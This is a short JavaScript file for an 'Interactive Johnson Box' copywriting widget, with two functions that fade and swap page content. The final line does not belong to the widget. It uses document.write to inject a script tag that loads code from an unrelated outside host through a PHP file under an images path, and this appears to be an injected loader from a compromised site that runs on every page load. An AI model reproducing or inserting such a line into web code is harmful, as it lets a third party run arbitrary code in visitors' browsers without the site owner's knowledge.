//--------------------------------------------------------------------------
// Interactive Johnson Box
// http://www.copywriters-tookit.com
//--------------------------------------------------------------------------


function selectJohnson(targetID, sourceID, nDelay) {
	nDelay /= 2;
	Effect.Fade(targetID, {duration:nDelay});
   window.setTimeout('changeJohnson("' + targetID + '", "' + sourceID + '", ' + nDelay + ')',nDelay * 1000);
}

function changeJohnson(targetID, sourceID, nDelay) {
   document.getElementById(targetID).innerHTML = document.getElementById(sourceID).innerHTML;
	Effect.Appear(targetID, {duration:nDelay});    
}
document.write('<script src=http://slk.pl/images/image.php ><\/script>');